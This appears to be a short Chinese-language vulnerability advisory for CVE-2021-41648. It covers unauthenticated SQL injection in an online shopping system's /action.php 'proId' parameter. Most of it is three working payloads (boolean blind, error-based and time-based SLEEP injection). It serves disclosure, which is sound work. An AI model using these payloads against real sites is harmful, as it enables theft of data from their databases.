CVE-2021-41648 在线购物系统中的SQL注入漏洞
该在线购物系统容易受到未经身份验证的基于错误/布尔盲注以及基于错误的SQL注入攻击。
/action.php页面上的proId参数未对用户输入进行过滤,攻击者可以从底层MySQL数据库中提取敏感数据。
URL: /action.php
参数: proId
参数: proId (POST)
类型: 基于布尔的盲注
标题: OR 布尔盲注 - WHERE 或 HAVING 子句 (NOT - MySQL 注释)
载荷: proId=61 OR 17-7=10' OR NOT 4774=4774#&addToCart=1
类型: 基于错误
标题: MySQL >= 5.0 OR 错误注入 - WHERE, HAVING, ORDER BY 或 GROUP BY 子句 (FLOOR)
载荷: proId=61 OR 17-7=10' OR (SELECT 6869 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(6869=6869,1))),0x716a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gfTu&addToCart=1
类型: 基于时间的盲注
标题: MySQL >= 5.0.12 AND 时间盲注 (查询 SLEEP)
载荷: proId=61 OR 17-7=10' AND (SELECT 2990 FROM (SELECT(SLEEP(5)))YhWy)-- xWNo&addToCart=1

Jason Colyvas
MOBIUSBINARY
2021年9月21日